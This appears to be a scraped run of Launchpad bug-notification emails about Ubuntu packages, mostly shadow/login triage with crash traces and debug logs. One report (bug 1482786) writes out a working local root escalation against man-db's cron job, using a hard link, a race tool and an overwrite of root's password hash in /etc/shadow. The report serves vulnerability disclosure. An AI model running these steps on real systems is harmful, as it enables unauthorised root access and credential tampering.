0035-attach-make-do_attach-void.patch - 0036-attach-use-close_prot_errno_disarm.patch - 0037-attach-add-some-DEBUG-logging-to-stdfd-dpulication.patch - 0038-cgroups-fix-cgroup-mounting.patch - 0039-utils-fix-mount_at.patch - 0040-configure-fix-static-builds-with-clang-12-and-LTO.patch - 0041-cgroups-bpf-fixes.patch - 0042-croups-improve-__do_bpf_program_free.patch - 0043-cgroups-coding-style-fixes.patch - 0044-cgroups-don-t-initiliaze-NULL-log.patch - 0045-cgroups-ensure-all-memory-is-zeroed.patch - 0046-cgroups-use-zalloc.patch - 0047-cgroups-tweak-cgroup-initialization.patch - 0048-log-remove-pointless-inline.patch - 0049-log-add-lxc_log_get_fd.patch - 0050-seccomp-use-lxc_log_get_fd.patch - 0051-log-rework-lxc_log_get_level.patch - 0052-seccomp-use-lxc_log_get_level.patch - 0053-cgroups-use-bpf-log-when-logging-at-trace-level.patch - 0054-log-add-lxc_log_trace-helper.patch - 0055-cgroups-use-PTR_TO_U64.patch - 0056-cgroups-align-methods.patch - 00
[Touch-packages] [Bug 1532314] Re: Buffer overflow in cgmanager
I'm not sure 'fix released' is correct. Was a patch posted to fix it? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1532314 Title: Buffer overflow in cgmanager Status in cgmanager package in Ubuntu: Fix Released Status in libnih package in Ubuntu: Confirmed Status in lxc package in Ubuntu: Confirmed Bug description: Host: Ubuntu 15.10 lxc: 1.1.5-0ubuntu0.15.10.3 cgmanager: 0.39-2ubuntu2 Container: Ubuntu 15.10 Got the following trace in syslog. Please let me know what other information will be useful for troubleshooting. Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: *** buffer overflow detected ***: /sbin/cgmanager terminated Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: === Backtrace: = Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: /lib/x86_64-linux-gnu/libc.so.6(+0x78c4e)[0x7f1929550c4e] Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: /lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7f19295f0e8c] Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: /lib/x86_64-linux-gnu/libc.so.6(+0x116e80)[0x7f19295eee80] Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: /lib/x86_64-linux-gnu/libc.so.6(+0x118dd7)[0x7f19295f0dd7] Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: /lib/x86_64-linux-gnu/libnih.so.1(nih_io_handle_fds+0xad)[0x7f1929d01b3d] Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: /lib/x86_64-linux-gnu/libnih.so.1(nih_main_loop+0x13f)[0x7f1929d05faf] Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: /sbin/cgmanager(+0x5145)[0x562d8fc75145] Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f19294f8a40] Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: /sbin/cgmanager(+0x53d9)[0x562d8fc753d9] Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: === Memory map: Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 562d8fc7-562d8fc92000 r-xp ca:01 12884 /sbin/cgmanager Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 562d8fe92000-562d8fe94000 r--p 00022000 ca:01 12884 /sbin/cgmanager Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 562d8fe94000-562d8fe95000 rw-p 00024000 ca:01 12884 /sbin/cgmanager Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 562d915f8000-562d9203 rw-p 00:00 0 [heap] Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927d44000-7f1927d5a000 r-xp ca:01 395872 /lib/x86_64-linux-gnu/libgcc_s.so.1 Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927d5a000-7f1927f59000 ---p 00016000 ca:01 395872 /lib/x86_64-linux-gnu/libgcc_s.so.1 Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927f59000-7f1927f5a000 r--p 00015000 ca:01 395872 /lib/x86_64-linux-gnu/libgcc_s.so.1 Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927f5a000-7f1927f5b000 rw-p 00016000 ca:01 395872 /lib/x86_64-linux-gnu/libgcc_s.so.1 Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927f5b000-7f1927f67000 r-xp ca:01 403839 /lib/x86_64-linux-gnu/libnss_files-2.21.so Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1927f67000-7f1928166000 ---p c000 ca:01 403839 /lib/x86_64-linux-gnu/libnss_files-2.21.so Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928166000-7f1928167000 r--p b000 ca:01 403839 /lib/x86_64-linux-gnu/libnss_files-2.21.so Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928167000-7f1928168000 rw-p c000 ca:01 403839 /lib/x86_64-linux-gnu/libnss_files-2.21.so Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928168000-7f1928173000 r-xp ca:01 403823 /lib/x86_64-linux-gnu/libnss_nis-2.21.so Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928173000-7f1928372000 ---p b000 ca:01 403823 /lib/x86_64-linux-gnu/libnss_nis-2.21.so Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928372000-7f1928373000 r--p a000 ca:01 403823 /lib/x86_64-linux-gnu/libnss_nis-2.21.so Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928373000-7f1928374000 rw-p b000 ca:01 403823 /lib/x86_64-linux-gnu/libnss_nis-2.21.so Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f1928374000-7f192838b000 r-xp ca:01 403845 /lib/x86_64-linux-gnu/libnsl-2.21.so Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f192838b000-7f192858a000 ---p 00017000 ca:01 403845 /lib/x86_64-linux-gnu/libnsl-2.21.so Jan 8 19:29:24 ip-10-169-249-164 cgmanager[7725]: 7f192858a000-7f192858b000 r--p 00016000 ca:01
[Touch-packages] [Bug 73024] Re: unknown item 'FAIL_DELAY'
Marking invalid as the comment in login.defs says these are handled by pam. ** Changed in: shadow (Ubuntu) Status: Confirmed => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/73024 Title: unknown item 'FAIL_DELAY' Status in shadow package in Ubuntu: Invalid Bug description: Some package doesn't understand FAIL_DELAY in /etc/login.defs. On logging in the terminal session (CTRL+ALT+F*) a message "configuration error - unknown item 'FAIL_DELAY' (notify administrator)" appears. The same happens if I use su. If I comment the appropriate line in /etc/login.defs, the message doesn't appear. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/73024/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 117736] Re: pam_mount unable to unmount needs root priv
Marking fix released for shadow based on the openssh and debian status. ** Changed in: shadow (Ubuntu) Status: Confirmed => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/117736 Title: pam_mount unable to unmount needs root priv Status in PAM: In Progress Status in libpam-mount package in Ubuntu: Confirmed Status in openssh package in Ubuntu: Fix Released Status in shadow package in Ubuntu: Fix Released Status in Debian: Fix Released Bug description: Binary package hint: libpam-mount From pam_mount developer Jan Engelhard sourceforge mailing list: "pam_mount *needs* the root privileges, but Ubuntu's PAM configuration decided to throw them away after the login sequence completed." From Ubuntu Feisty Fawn user Kalisto: "When using loopback encrypted file systems this is a security issue, user logs out but the device is not umounted!! Without pam_mount debug option set this is not immediately apparent to the user! I have followed the instructions on: http://felipe- alfaro.org/blog/2006/08/19/encrypted-home-on-ubuntu-using-cryptoloop/ To create a loopback encrypted home directory with pam_mount. The dir mounts ok and seemes to work however on logout I get " error setting uid to 0" lsof -n | grep /home/crypto comes up empty. I have included a pam_mount debug output for the login and logout process: For easier viewing: http://rafb.net/p/HLVzwm40.nln.html user@trinity:su crypto pam_mount(pam_mount.c:461) pam_sm_open_session: real uid/gid=0:1001, effective uid/gid=0:1001 pam_mount(readconfig.c:418) checking sanity of volume record (/home/crypto.img) pam_mount(pam_mount.c:476) about to perform mount operations pam_mount(mount.c:368) information for mount: pam_mount(mount.c:369) -- pam_mount(mount.c:370) (defined by globalconf) pam_mount(mount.c:373) user: crypto pam_mount(mount.c:374) server: pam_mount(mount.c:375) volume:/home/crypto.img pam_mount(mount.c:376) mountpoint:/home/crypto pam_mount(mount.c:377) options: loop,user,exec,encryption=aes,keybits=128 pam_mount(mount.c:378) fs_key_cipher: aes-128-ecb pam_mount(mount.c:379) fs_key_path: /home/crypto.key pam_mount(mount.c:380) use_fstab: 0 pam_mount(mount.c:381) -- pam_mount(mount.c:177) realpath of volume "/home/crypto" is "/home/crypto" pam_mount(mount.c:182) checking to see if /home/crypto.img is already mounted at /home/crypto pam_mount(mount.c:755) /home/crypto.img already seems to be mounted at /home/crypto, skipping pam_mount(pam_mount.c:123) clean system authtok (0) pam_mount(misc.c:264) command: /usr/sbin/pmvarrun [-u] [crypto] [-o] [1] pam_mount(misc.c:341) set_myuid(pre): real uid/gid=0:1001, effective uid/gid=0:1001 pam_mount(misc.c:376) set_myuid(post): real uid/gid=0:1001, effective uid/gid=0:1001 pam_mount(pam_mount.c:360) pmvarrun says login count is 3 pam_mount(pam_mount.c:493) done opening session pam_mount(pam_mount.c:106) Clean global config (0) === crypto@trinity:exit exit pam_mount(pam_mount.c:535) received order to close things pam_mount(pam_mount.c:536) real and effective user ID are 1001 and 1001. pam_mount(misc.c:264) command: /usr/sbin/pmvarrun [-u] [crypto] [-o] [-1] pam_mount(misc.c:341) set_myuid(pre): real uid/gid=1001:1001, effective uid/gid=1001:1001 pam_mount(misc.c:346) error setting uid to 0 pam_mount(pam_mount.c:360) pmvarrun says login count is 2 pam_mount(pam_mount.c:564) crypto seems to have other remaining open sessions pam_mount(pam_mount.c:569) pam_mount execution complete pam_mount(pam_mount.c:535) received order to close things pam_mount(pam_mount.c:536) real and effective user ID are 1001 and 1001. pam_mount(misc.c:264) command: /usr/sbin/pmvarrun [-u] [crypto] [-o] [-1] pam_mount(misc.c:341) set_myuid(pre): real uid/gid=1001:1001, effective uid/gid=1001:1001 pam_mount(misc.c:346) error setting uid to 0 pam_mount(pam_mount.c:360) pmvarrun says login count is 1 pam_mount(pam_mount.c:564) crypto seems to have other remaining open sessions pam_mount(pam_mount.c:569) pam_mount execution complete pam_mount(pam_mount.c:106) Clean global config (0) === Entry in /etc/security/pam_mount.conf volume crypto auto - /home/crypto.img /home/crypto loop,user,exec,encryption=aes,keybits=128 aes-128-ecb /home/crypto.key /Kalisto" To manage notifications about this bug go to: https://bugs.launchpad.net/pam/+bug/117736/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe :
[Touch-packages] [Bug 621528] Re: package nfs-common 1:1.2.0-4ubuntu4 failed to install/upgrade: el subproceso script post-installation instalado devolvió el código de salida de error 1
** Package changed: shadow (Ubuntu) => nfs-utils (Ubuntu) ** Changed in: nfs-utils (Ubuntu) Status: New => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/621528 Title: package nfs-common 1:1.2.0-4ubuntu4 failed to install/upgrade: el subproceso script post-installation instalado devolvió el código de salida de error 1 Status in nfs-utils package in Ubuntu: Invalid Bug description: Estaba actualizando el juego WARZONE 2100 y me aparece ese error cada vez que descargo del Synaptic ProblemType: Package DistroRelease: Ubuntu 10.04 Package: nfs-common 1:1.2.0-4ubuntu4 ProcVersionSignature: Ubuntu 2.6.32-23.37-generic 2.6.32.15+drm33.5 Uname: Linux 2.6.32-23-generic i686 NonfreeKernelModules: wl Architecture: i386 Date: Fri Aug 20 21:38:12 2010 ErrorMessage: el subproceso script post-installation instalado devolvió el código de salida de error 1 InstallationMedia: Ubuntu 10.04 LTS "Lucid Lynx" - Release i386 (20100429) SourcePackage: nfs-utils Title: package nfs-common 1:1.2.0-4ubuntu4 failed to install/upgrade: el subproceso script post-installation instalado devolvió el código de salida de error 1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/nfs-utils/+bug/621528/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1669156] Re: Fails writing with Caps Lock
This is not a shadow bug. It's either a bug in the graphical login manager, or X, or a terminal driver. Please re-open if it is still relevant. ** Package changed: shadow (Ubuntu) => lightdm (Ubuntu) ** Changed in: lightdm (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lightdm in Ubuntu. https://bugs.launchpad.net/bugs/1669156 Title: Fails writing with Caps Lock Status in lightdm package in Ubuntu: Incomplete Bug description: On Ubuntu 16.04: When clicking on the following 3 keyboard keys simultaneously: Left-CTRL + Left-ALT + F1 Then you get to a textual terminal (CLI) where you can type commands. But there is a problem when typing English letters with Caps Lock turned on: Instead of English capital letters - you see squares, so actually you can't login to your user that way if the username/password has Capital letters. The only method which allows you to write capital English letters is to simultaneously click Left-Shift + 'a letter'. That is the only method that works well. Note that the Caps Lock key works well with the graphical terminal (pseudo / pts) that appears on Ubuntu when hitting simultaneously: Left-CTRL + Left-ALT + T --- I assumed the bug report is relevant to "shadow" package because that the "/bin/login" binary comes from that package. Package version of 'shadow' is: 1:4.2-3.1ubuntu5 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1669156/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1608026] Re: package login 1:4.1.5.1-1ubuntu9 failed to install/upgrade: package login is not ready for configuration cannot configure (current status `half-installed')
** Changed in: shadow (Ubuntu) Status: New => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1608026 Title: package login 1:4.1.5.1-1ubuntu9 failed to install/upgrade: package login is not ready for configuration cannot configure (current status `half-installed') Status in shadow package in Ubuntu: Fix Released Bug description: Trying install Ubuntu 14.04 LTS at IBM ThinkPad T41. Using "forcepae" succeeds. Machine is very slow... Compiz very active: 30 to 50 % CPU ProblemType: Package DistroRelease: Ubuntu 14.04 Package: login 1:4.1.5.1-1ubuntu9 ProcVersionSignature: Ubuntu 3.16.0-30.40~14.04.1-generic 3.16.7-ckt3 Uname: Linux 3.16.0-30-generic i686 ApportVersion: 2.14.1-0ubuntu3.7 Architecture: i386 Date: Sat Jul 30 10:38:30 2016 DpkgTerminalLog: dpkg: error processing package login (--configure): package login is not ready for configuration cannot configure (current status `half-installed') DuplicateSignature: package:login:1:4.1.5.1-1ubuntu9:package login is not ready for configuration cannot configure (current status `half-installed') ErrorMessage: package login is not ready for configuration cannot configure (current status `half-installed') InstallationDate: Installed on 2016-07-30 (0 days ago) InstallationMedia: Ubuntu 14.04.2 LTS "Trusty Tahr" - Release i386 (20150218.1) SourcePackage: shadow Title: package login 1:4.1.5.1-1ubuntu9 failed to install/upgrade: package login is not ready for configuration cannot configure (current status `half-installed') UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1608026/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1595080] Re: /etc/shadow has wrong ownership
On my 18.04 laptop it is group shadow and group readable. If anyone can still reproduce this, please re-open this bug. It is likely an intaller bug. ** Changed in: shadow (Ubuntu) Status: New => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1595080 Title: /etc/shadow has wrong ownership Status in shadow package in Ubuntu: Fix Released Bug description: I think this is identical to bug 50587 but the latter is rather old, dating from 2006. On the latest ubuntu 16.04 LTS the ownership of /etc/shadow is still not fixed. To my understanding it should be -r--r- 1 root shadow to conform to legacy programs as well and not -rw--- 1 root root as it is on a new install. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1595080/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1770233] Re: Login package changes MIN_UID in /etc/login.defs -> AccountsService/GDM then ignores existing user (UID 501) -> starts gnome-inital-setup to create user
** Package changed: shadow (Ubuntu) => gnome-initial-setup (Ubuntu) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1770233 Title: Login package changes MIN_UID in /etc/login.defs -> AccountsService/GDM then ignores existing user (UID 501) -> starts gnome-inital-setup to create user Status in gnome-initial-setup package in Ubuntu: New Bug description: On May 8. 2018 I was prompted to upgrade from 17.10 to 18.04. The upgrade went smooth except that the installer asked me if it could make changes to /etc/login.defs. I thought it was supposed to not ask questions (and stall the upgrade if I was away from the computer), but I pressed yes and it continued. I pressed yes since I had not personally modified this file as far as I can remember and was not particularly attached to its contents. After reboot gnome-initial-setup wants me to create a new user. There is no (obvious) way to login with my old user, but Ctrl+Alt+F2 luckily worked---I could log in and all my files where still there. I tried changing UID_MIN in /etc/login.defs back to 500 from 1000 (I believe this was the change I was prompted about), but I still could not login graphically, so the /etc/login.defs change may have been unconnected to the bug. I was able to figure out that the offending program was called gnome- initial-setup and an "apt purge gnome-initial-setup" later I could log in as normal. I do not believe an average user could have figured this out (how many even know about the virtual terminals Ctrl+Alt+FX?). To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-initial-setup/+bug/1770233/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 914499] Re: 'su --help' exits with error code 2
** Changed in: shadow (Ubuntu) Status: New => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/914499 Title: 'su --help' exits with error code 2 Status in shadow package in Ubuntu: Fix Released Bug description: Version: 1:4.1.4.2-1ubuntu3.2 Linux applications that have a "help" or "usage" option almost universally print the requested help to stdout and return with an exit code of zero. There was, after all, no error since the user explicitly requested this output. 'su --help', for no apparent reason, prints its help to stderr and exits with code 2. As long as there is a non-zero exit code, output to stderr is correct, but it I am convinced the exit code should be zero and the output should go to stdout. Oddly, although the 'man su' pages do not list -h or --help among the available options, 'su --help' does (it also does not complain of an invalid option). I'm reporting this here because the su maintainers are listed as "Ubuntu Developers ". To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/914499/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1388272] Re: Login screen shows different background picture such as set for desktop background
This clearly is not related to shadow, but which package it affects would depend on which login manager was being used. In the unlikely event this is still an issue, please re-open this bug and let us know which you are using. ** Changed in: shadow (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1388272 Title: Login screen shows different background picture such as set for desktop background Status in shadow package in Ubuntu: Incomplete Bug description: Ubuntu 14.10 shows a different background for login screen such as set for desktop background. In 14.04 it was working fine. I don't know what's the original behavior of 14.10, it may have change since 14.04 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1388272/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages
@cjwatson - is it safe to assume the fix was entirely in man-db? Or was shadow supposed to do something here as well? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1482786 Title: man-db daily cron job TOCTOU bug when processing catman pages Status in apport package in Ubuntu: Confirmed Status in man-db package in Ubuntu: Fix Released Status in pam package in Ubuntu: Confirmed Status in shadow package in Ubuntu: Confirmed Bug description: The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is: # expunge old catman pages which have not been read in a week if [ -d /var/cache/man ]; then cd / if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then find /var/cache/man -ignore_readdir_race ! -user man -print0 | \ xargs -r0 chown -f man || true fi ... By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation. man# mkdir -p /var/cache/man/etc man# ln /var/crash/.lock /var/cache/man/etc/shadow man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc ... Wait till daily cronjob was run man# cp /etc/shadow . man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x man# cat x > /etc/shadow; rm x man# su -s /bin/sh (password is 123) root# cat shadow > /etc/shadow; chown root /etc/shadow # lsb_release -rd Description:Ubuntu 14.04.3 LTS Release:14.04 # apt-cache policy man-db man-db: Installed: 2.6.7.1-1ubuntu1 Candidate: 2.6.7.1-1ubuntu1 Version table: *** 2.6.7.1-1ubuntu1 0 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.6.7.1-1 0 500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages [1] http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1450880] Re: Impossible to set root password in Ubuntu Touch
If this is still an issue, please re-open this bug. ** Changed in: shadow (Ubuntu) Status: Confirmed => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1450880 Title: Impossible to set root password in Ubuntu Touch Status in shadow package in Ubuntu: Invalid Bug description: On the bq Aquaris Ubuntu Edition it is not possible to set a root password. Normally you can use sudo passwd root to set the root password, but this fail with following message: passwd: Authentication token manipulation error passwd: password unchanged On the Ubuntu on my pc I do not use a root password, as my user password is strong enough. But on a smart phone I use a shorter password, as I have to enter it way too often. Also I guess this counts for most other users. The root access should be still secure, so a separate root password is needed. ProblemType: Bug DistroRelease: Ubuntu RTM 14.09 Package: passwd 1:4.1.5.1-1.1ubuntu2 Uname: Linux 3.4.67 armv7l ApportVersion: 2.14.7-0ubuntu8 Architecture: armhf Date: Sat Apr 18 18:30:19 2015 InstallationDate: Installed on 2015-04-10 (7 days ago) InstallationMedia: Ubuntu Utopic Unicorn (development branch) - armhf (20150410-232623) SourcePackage: shadow UpgradeStatus: No upgrade log present (probably fresh install) modified.conffile..etc.cron.daily.passwd: [deleted] To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1450880/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1547907] Re: package login 1:4.1.5.1-1ubuntu9.2 failed to install/upgrade: unable to install new version of `/bin/su': Device or resource busy
Thanks for reporting this bug. Please reply if you have some situation where this might still occur. ** Changed in: shadow (Ubuntu) Status: New => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1547907 Title: package login 1:4.1.5.1-1ubuntu9.2 failed to install/upgrade: unable to install new version of `/bin/su': Device or resource busy Status in shadow package in Ubuntu: Invalid Bug description: This happens on every startup ProblemType: Package DistroRelease: Ubuntu 14.04 Package: login 1:4.1.5.1-1ubuntu9.2 ProcVersionSignature: Ubuntu 3.13.0-77.121-generic 3.13.11-ckt32 Uname: Linux 3.13.0-77-generic x86_64 ApportVersion: 2.14.1-0ubuntu3.19 Architecture: amd64 Date: Thu Feb 18 22:39:20 2016 DpkgTerminalLog: Preparing to unpack .../login_1%3a4.1.5.1-1ubuntu9.2_amd64.deb ... Unpacking login (1:4.1.5.1-1ubuntu9.2) over (1:4.1.5.1-1ubuntu9.1) ... DuplicateSignature: package:login:1:4.1.5.1-1ubuntu9.2:unable to install new version of `/bin/su': Device or resource busy ErrorMessage: unable to install new version of `/bin/su': Device or resource busy InstallationDate: Installed on 2015-01-31 (385 days ago) InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 (20140722.2) RelatedPackageVersions: dpkg 1.17.5ubuntu5.5 apt 1.0.1ubuntu2.11 SourcePackage: shadow Title: package login 1:4.1.5.1-1ubuntu9.2 failed to install/upgrade: unable to install new version of `/bin/su': Device or resource busy UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1547907/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1565345] Re: ubuntuBSD support
Hi, looking at the package today, control already has libaudit-dev [linux- any] and --with-audit was dropped from rules, so I believe what you want should already be achieved. Please re-open if that's not the case. ** Changed in: shadow (Ubuntu) Status: New => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1565345 Title: ubuntuBSD support Status in shadow package in Ubuntu: Fix Released Bug description: Hi Please could you apply attached patch to make shadow buildable on ubuntuBSD? It just needs to adjust the libaudit dependency and build flags. Thanks! To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1565345/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1679765] Re: cannot lock password for user created with useradd --extrausers
Extrausers is a concept introduced by the libnss-extrausers package. shadow and passwd simply know nothing about it. It simply is not a bug in the shadow package. It's a wholly un- implemented feature. It's not clear to me how this would function - after all these are supposed to be accounts 'copied from other systems' according to the package. And I'm not clear on how these would relate to ldap, for instance. So if you are interested in using passwd or usermod for these, I would recommend opening a discussion at either (or both) github.com/shadow- maint/shadow/issues, or probably better at the libnss-extrausers package. ** Changed in: shadow (Ubuntu) Status: Confirmed => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1679765 Title: cannot lock password for user created with useradd --extrausers Status in shadow package in Ubuntu: Invalid Bug description: passwd -l does not take --extrausers or otherwise work for extrausers. Neither does usermod. % mkdir -p /var/lib/extrausers % for f in passwd group gshadow subuid subgid shadow; do touch /var/lib/extrausers/$f; done % useradd foo --extrausers --shell /bin/bash -m % echo $? 0 % # cat /var/lib/extrausers/passwd foo:x:1001:1001::/home/foo:/bin/bash % passwd -l foo passwd: user 'foo' does not exist % passwd --extrausers -l foo passwd: unrecognized option '--extrausers' % usermod --lock foo usermod: user 'foo' does not exist % usermod --extrausers --lock foo usermod: unrecognized option '--extrausers' ProblemType: Bug DistroRelease: Ubuntu 16.04 Package: passwd 1:4.2-3.1ubuntu5 ProcVersionSignature: Ubuntu 4.9.0-15.16-generic 4.9.5 Uname: Linux 4.9.0-15-generic x86_64 ApportVersion: 2.20.1-0ubuntu2.5 Architecture: amd64 Date: Tue Apr 4 16:34:20 2017 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) LANG=C.UTF-8 SourcePackage: shadow UpgradeStatus: No upgrade log present (probably fresh install) Related bugs: * bug 1679777: Adding and reporting ssh keys fails for user in extrausers To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1679765/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1860926] Re: Ubuntu 20.04 Systemd fails to configure bridged network
